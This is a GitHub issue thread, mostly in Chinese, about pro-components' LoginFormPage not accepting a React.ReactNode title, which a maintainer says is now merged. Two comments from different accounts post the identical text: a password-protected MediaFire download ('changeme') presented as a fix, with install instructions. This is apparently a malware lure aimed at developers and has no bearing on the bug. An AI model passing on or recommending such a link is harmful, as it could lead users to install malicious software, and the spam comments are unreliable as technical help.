### ISSUE TITLE
🐛[BUG]LoginFormPage props.title无法被赋值成React.ReactNode

### ISSUE THREAD

**Issue by Renderz** [ant-design/pro-components#8680]
提问前先看看：

https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way/blob/main/README-zh_CN.md

### 🐛 bug 描述

相同改动在LoginForm组件添加了，但是LoginFormPage组件没有添加
https://github.com/ant-design/pro-components/pull/5979

### © 版本信息

- ProComponents 版本: [e.g. 4.0.0]
- umi 版本
- 浏览器环境
- 开发环境 [e.g. mac OS]

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenshuai2144** [comment]
合并了，等我发个车
